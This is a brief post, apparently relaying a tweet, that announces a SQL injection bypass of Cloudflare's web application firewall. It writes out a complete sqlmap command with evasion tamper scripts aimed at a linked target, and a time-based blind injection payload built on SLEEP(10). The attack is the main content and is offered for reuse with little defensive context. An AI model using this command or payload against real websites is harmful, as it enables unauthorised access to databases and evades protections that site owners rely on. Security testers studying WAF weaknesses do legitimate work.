WAF bypass by akaclandestine – Web application firewalls bypasses collection and testing tools

A SQL Injection bypass for Cloudflare WAF was found using the payload:

sqlmap -u "https://t.co/fx6sdR0JvY" –dbs –batch –time-sec 10 –level 3 –hex –random-agent –tamper=space2comment,betweeny

Payload used in the bypass:

+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)

This bypass utilizes time-based blind SQL injection. Cloudflare WAF was bypassed using this technique. More details and technical information can be found on our blog post.
For more insights, check out the original tweet here: https://twitter.com/akaclandestine/status/1884185341298630678. And don’t forget to follow @akaclandestine for more exciting updates in the world of cybersecurity.